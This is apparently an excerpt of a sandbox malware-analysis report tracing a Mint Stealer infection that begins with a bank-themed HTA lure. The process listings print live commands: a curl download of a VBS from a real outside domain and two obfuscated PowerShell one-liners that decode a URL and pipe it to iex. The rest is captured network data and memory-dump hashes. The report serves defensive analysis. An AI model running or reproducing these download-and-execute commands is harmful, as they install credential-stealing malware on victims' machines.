                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 6d 65 6e 74 20 6f 6e 6c 79 20 63 68 61 70 74 65 72 20 77 65 72 65 20 74 68 69 73 20 68 69 67 68 65 73 74 20 74 6f 6f 20 77 61 73 20 74 68 65 20 70 6f 77 65 72 66 75 6c 20 31 33 34 20 77 65 72 65 20 6c 65 61 64 65 72 20 74 68 61 74 20 74 68 65 20 74 68 65 20 74 68 65 20 43 72 69 65 20 73 61 69 64 20 74 68 61 74 20 63 6f 75 6c 64 20 6c 69 62 65 72 74 79 20 50 72 65 73 62 79 74 65 72 69 61 6e 73 20 73 61 76 65 64 20 61 6e 64 20 62 75 74 20 70 72 6f 6d 6f 74 65 64 20 43 68 75 72 63 68 20 74 68 65 20 61 6e 64 20 63 61 6d 65 20 61 6e 64 20 68 69 73 20 74 68 65 20 43 68 75 72 63 68 20 6c 61 75 67 68 20 73 79 73 74 65 6d 20 69 6e 74 65 72 65 73 74 20 70 61 74 72 69 6f 74 69 73 6d 20 31 38 39 39 0a 2f 2f 6c 61 6e 64 20 74 68 65 20 69 6e 74 65 72 65 73 74 20 4c 61
                                                                                                                            Data Ascii: ment only chapter were this highest too was the powerful 134 were leader that the the the Crie said that could liberty Presbyterians saved and but promoted Church the and came and his the Church laugh system interest patriotism 1899//land the interest La
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 6f 6e 65 20 69 6e 74 65 72 65 73 74 20 74 68 65 20 61 6e 64 20 64 69 73 65 73 74 65 65 6d 65 64 20 74 68 65 20 73 6f 76 65 72 65 69 67 6e 74 79 20 74 68 61 74 20 53 63 6f 74 20 45 4e 47 4c 41 4e 44 20 70 65 6f 70 6c 65 20 43 6f 6e 73 74 61 62 6c 65 20 67 6f 76 65 72 6e 6d 65 6e 74 20 74 68 65 20 74 68 65 20 66 6f 72 63 65 73 20 65 63 63 6c 65 73 69 61 73 74 69 63 61 6c 20 77 69 74 68 0a 2f 2f 6f 6e 65 20 61 6c 6c 20 43 48 41 50 54 45 52 20 31 33 34 20 61 6e 64 20 50 72 6f 74 65 73 74 61 6e 74 69 73 6d 20 6f 74 68 65 72 20 66 6f 72 20 77 61 73 20 47 49 46 54 20 77 69 74 68 20 61 6e 79 20 4d 45 4c 56 49 4c 4c 45 20 53 45 44 41 4e 20 63 6f 75 6e 74 72 79 6d 65 6e 20 76 69 74 61 6c 20 74 77 6f 20 61 6e 64 20 43 68 75 72 63 68 20 41 53 53 45 4d 42 4c 49 45 53
                                                                                                                            Data Ascii: one interest the and disesteemed the sovereignty that Scot ENGLAND people Constable government the the forces ecclesiastical with//one all CHAPTER 134 and Protestantism other for was GIFT with any MELVILLE SEDAN countrymen vital two and Church ASSEMBLIES
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 20 69 6e 74 65 72 65 73 74 20 53 63 6f 74 74 69 73 68 20 73 70 69 72 69 74 65 64 20 43 48 41 50 54 45 52 20 65 6e 74 65 72 70 72 69 73 65 73 20 73 61 79 73 20 74 68 65 20 45 4e 47 4c 41 4e 44 20 62 65 65 6e 20 74 72 75 74 68 20 70 6f 6c 69 63 79 20 61 64 76 61 6e 63 65 64 0a 2f 2f 64 75 74 69 65 73 20 74 68 65 69 72 20 66 61 6d 65 20 6b 69 6e 64 20 72 65 70 72 65 73 65 6e 74 61 74 69 76 65 73 20 70 61 74 72 69 6f 74 69 73 6d 20 68 65 72 20 69 6e 64 69 76 69 64 75 61 6c 20 74 72 75 6c 79 20 73 74 72 75 67 67 6c 65 20 74 68 65 20 31 31 36 20 61 6e 64 20 68 69 73 20 4d 65 6c 76 69 6c 6c 65 20 72 65 73 6f 72 74 20 70 6f 6c 65 6d 69 63 20 6f 75 72 20 56 49 49 49 20 46 6f 6f 74 6e 6f 74 65 73 20 74 68 65 20 74 68 65 20 73 74 72 75 67 67 6c 65 20 6f 6e 65 20 68
                                                                                                                            Data Ascii: interest Scottish spirited CHAPTER enterprises says the ENGLAND been truth policy advanced//duties their fame kind representatives patriotism her individual truly struggle the 116 and his Melville resort polemic our VIII Footnotes the the struggle one h



                                                                                                                            Target ID:0
                                                                                                                            Start time:10:30:01
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta"
                                                                                                                            Imagebase:0x520000
                                                                                                                            File size:13'312 bytes
                                                                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:2
                                                                                                                            Start time:10:30:07
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
                                                                                                                            Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:10:30:07
Start date:17/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:10:30:07
Start date:17/12/2024
Path:C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):true
Commandline:curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
Imagebase:0x630000
File size:470'528 bytes
MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:5
Start time:10:30:09
Start date:17/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:10:30:10
Start date:17/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:10:30:10
Start date:17/12/2024
Path:C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
Imagebase:0xc30000
File size:147'456 bytes
MD5 hash:FF00E0480075B095948000BDC66E81F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:10:30:10
Start date:17/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:10:30:10
Start date:17/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:10:30:11
Start date:17/12/2024
Path:C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
Imagebase:0xc30000
File size:147'456 bytes
MD5 hash:FF00E0480075B095948000BDC66E81F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:10:30:15
Start date:17/12/2024
Path:C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js
Imagebase:0xc30000
File size:147'456 bytes
MD5 hash:FF00E0480075B095948000BDC66E81F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:10:30:16
Start date:17/12/2024
Path:C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\pmxdhq.js
Imagebase:0xc30000
File size:147'456 bytes
MD5 hash:FF00E0480075B095948000BDC66E81F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:10:30:16
Start date:17/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:10:30:16
Start date:17/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 0000000F.00000002.1967997619.0000021C0FA47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:16
Start time:10:30:18
Start date:17/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:conhost --headless powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:10:30:18
Start date:17/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true
Memory Dump Source
• Source File: 00000000.00000003.1828876954.00000000063E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_63e0000_mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
• Instruction ID: 60583c026d2b6ff5c029b7772b2734be6da6b2c4978fc2104f0dd9312e2ff3b5
• Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
• Instruction Fuzzy Hash:
Memory Dump Source
• Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e1f2b612485430eafbcf3af77bd768f68a6d1f07685298f81f731f6b2af7f63f
                                                                                                                              • Instruction ID: bd6c14ab9b67df44de6e3a863181ac3a4e6d2e17e157644089cd6e3e9480c077
                                                                                                                              • Opcode Fuzzy Hash: e1f2b612485430eafbcf3af77bd768f68a6d1f07685298f81f731f6b2af7f63f
                                                                                                                              • Instruction Fuzzy Hash: AE221AB2A0EA8D4FE765EB6888656747BE1EF5A310F1900FFD09DC71E3DA25A805C701
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d653f8de2240128b4dbed79bea0a662b41766384bab4604a78eeb0203d291ff6
                                                                                                                              • Instruction ID: 247dfc804816eac13c0fd3363ca40d4403f6c6f2e137991000c16bf5d48cf15c
                                                                                                                              • Opcode Fuzzy Hash: d653f8de2240128b4dbed79bea0a662b41766384bab4604a78eeb0203d291ff6
                                                                                                                              • Instruction Fuzzy Hash: 52D13972A1FA8E0FEBA5ABA848755B57BD0EF59314B0901FFD05DCB0E3DA18A905C341
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1989686560.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b7f0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dd059c517131d3f85f3624c7a814af3876090f57aa2a241e2d44d668109dfd04
                                                                                                                              • Instruction ID: 4f4cb11305e85de30ffcec87ae312cdfc91cbf775e40732a5b9d04617f39c927
                                                                                                                              • Opcode Fuzzy Hash: dd059c517131d3f85f3624c7a814af3876090f57aa2a241e2d44d668109dfd04
                                                                                                                              • Instruction Fuzzy Hash: EEC13031B19A4D8FDF94DF98C465AADBBE1FF68300F164266D409D72A5CA34E881CBD0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8ff0457d41c2d89d8a4cf5a62e28b2773566b59c230cd57493225d974b05a06a
                                                                                                                              • Instruction ID: 94e0ebaa50335201b2f15e0df26f21255929f436bf444e4e83c9b2d7920f3249
                                                                                                                              • Opcode Fuzzy Hash: 8ff0457d41c2d89d8a4cf5a62e28b2773566b59c230cd57493225d974b05a06a
                                                                                                                              • Instruction Fuzzy Hash: AE810562A0E7C90FE762A76898649B17FE1DF5B210B0E01FFD489CB0E7D9189949C352
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6754bc3aaa80f72725473eb698a6911fc9db0a160b5450a8f1e9c6fd478d534f
                                                                                                                              • Instruction ID: 14112159ac74a795b897aa775483d99ab152d7b6c801f3664735a7e32e9fa28b
                                                                                                                              • Opcode Fuzzy Hash: 6754bc3aaa80f72725473eb698a6911fc9db0a160b5450a8f1e9c6fd478d534f
                                                                                                                              • Instruction Fuzzy Hash: 2461B29190F7CA0FE76397B888759A13FE19F57210B0E41EFD489CB0E7D919994AC312
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ffcf0bac076b599675c021c7c917bd27e6c3d0de268e5b60f5ed4ce8551a6919
                                                                                                                              • Instruction ID: 5e46a35a73a24610b405642d0247825e24ae503298a908f08795628ace717ac3
                                                                                                                              • Opcode Fuzzy Hash: ffcf0bac076b599675c021c7c917bd27e6c3d0de268e5b60f5ed4ce8551a6919
                                                                                                                              • Instruction Fuzzy Hash: BA51F692B0FACA0FD7A5A77C58E01B07FD2DF5A260B0A01FBD059CB1E3D9196C458351
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4bf338d9274fda5ed914700d9add328ad946d7f4fff9611fb9abe42d1227ce8c
                                                                                                                              • Instruction ID: 9c21b5e783aef8282ddc6148a1bd65eac01e01de32c6c210cd21002a4f73a538
                                                                                                                              • Opcode Fuzzy Hash: 4bf338d9274fda5ed914700d9add328ad946d7f4fff9611fb9abe42d1227ce8c
                                                                                                                              • Instruction Fuzzy Hash: 2031D462A5FBC60FD7A35BB408A54607FB0EF16650B4A00FBD458CB1E3E91C5C458712
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1989686560.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b7f0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4cb8c3f721682ae74389d8b835afade324bfcebf8bc5b29fe6ff483c1d2d80a3
                                                                                                                              • Instruction ID: cede955fff695cdf052e9aa63f952841fa75aa565bb086fee38127738a92e839
                                                                                                                              • Opcode Fuzzy Hash: 4cb8c3f721682ae74389d8b835afade324bfcebf8bc5b29fe6ff483c1d2d80a3
                                                                                                                              • Instruction Fuzzy Hash: 2701A77020CB0C4FD748EF0CE051AA9B7E0FB95320F10066DE58AC36A1D632E881CB45
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2062352354.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: j
                                                                                                                              • API String ID: 0-2137352139
                                                                                                                              • Opcode ID: d9b4512b8e77d6f950240df67cbd4f6fa99d1ad936dd38cf67d161f85b058d37
                                                                                                                              • Instruction ID: 020368aef14acfa0e6ea8bdea5d21c139751afe8d2a43c420312a872c158c84f
                                                                                                                              • Opcode Fuzzy Hash: d9b4512b8e77d6f950240df67cbd4f6fa99d1ad936dd38cf67d161f85b058d37
                                                                                                                              • Instruction Fuzzy Hash: 54510612B1FADA0FD7A9977858B45B07BD2DF5A26070901FBD049CF1E3E91C5C058391
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2062352354.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6b2ff1f5b0fbbf0e5404d12c01d703c312802ab222aefd9c1e1fadeed82decf4
                                                                                                                              • Instruction ID: ffc330060b26e8092cfe3cb13b9b43089a9d9c15facf0c964b2806005f25aeb0
                                                                                                                              • Opcode Fuzzy Hash: 6b2ff1f5b0fbbf0e5404d12c01d703c312802ab222aefd9c1e1fadeed82decf4
                                                                                                                              • Instruction Fuzzy Hash: 93222832A0EACD4FE765DB6888656647FE1EF5A310F0900BED05DCB1E3DA29AC46C741
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2061780729.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 906d1fc16e5ea6002d4a93ca51cd83e3c23669908738323c4fe887b9c5e5c037
                                                                                                                              • Instruction ID: a4dc95f4b05e2dd730e87a223b462857775b07dd89c7ba91970dae0f5505f727
                                                                                                                              • Opcode Fuzzy Hash: 906d1fc16e5ea6002d4a93ca51cd83e3c23669908738323c4fe887b9c5e5c037
                                                                                                                              • Instruction Fuzzy Hash: D7F1C231A09A4D8FDF99DF5CC455AE977E1FF68300F1542AAD449D72B6CA24EC82CB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2062352354.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7f13f85dfafe77f0712d0f4eb0738d040cf5b9d1c1bafb560c67e85c31dfeb9b
                                                                                                                              • Instruction ID: 2a8f6bf34eea3bebc8d47bbe15e641424e62cdfbdaa737ca6be56d8e908ff137
                                                                                                                              • Opcode Fuzzy Hash: 7f13f85dfafe77f0712d0f4eb0738d040cf5b9d1c1bafb560c67e85c31dfeb9b
                                                                                                                              • Instruction Fuzzy Hash: 41D13932A0EADE0FEBA5ABB848755B57B90EF59314B0900FED05DC71E3DA18A905C781
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.2061780729.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7b5b4700cabef836036bf597283c46e6f7da52146864f40bff394f5d653fdb88
                                                                                                                              • Instruction ID: 5b053de456ea2f6cf03f955e19496483f12ece1bc8953c79bfc6a6b5d9d9c4c5
                                                                                                                              • Opcode Fuzzy Hash: 7b5b4700cabef836036bf597283c46e6f7da52146864f40bff394f5d653fdb88
                                                                                                                              • Instruction Fuzzy Hash: 3EB1053160E7865FD3169B6898B55E67FE0EF4322470941FFD0DACB0B3DA18A846C752
                                                                                                                              Memory Dump Source
• Source File: 00000011.00000002.2062352354.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b8b0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 70669dd4feca5861035ef85efb8b8b170a9e3d7745deaf1e3bc91b0d18e33f36
• Instruction ID: 365cfe236e6a3154c5335fc86edacb0818c22bd37890b9abfe96547a2a4355df
• Opcode Fuzzy Hash: 70669dd4feca5861035ef85efb8b8b170a9e3d7745deaf1e3bc91b0d18e33f36
• Instruction Fuzzy Hash: C631E222A5FBC60FD7978BB408A40A47FA0AF1621070A00FBC458CB1E3EE1C5D49C752

Memory Dump Source
• Source File: 00000011.00000002.2061780729.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b3b48bb651b24c5904a2e5de7f68eba3516205580f8bd00a310b272f7710fa95
• Instruction ID: a0c2167b1b0d3f3826e60bf6f62beef7faf3de671d7ee8a2a08a44b671a440d9
• Opcode Fuzzy Hash: b3b48bb651b24c5904a2e5de7f68eba3516205580f8bd00a310b272f7710fa95
• Instruction Fuzzy Hash: DA01A77020CB0C4FD748EF0CE051AA9B3E0FF95320F10056DE58AC36A1D632E881CB41

Memory Dump Source
• Source File: 00000011.00000002.2061780729.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
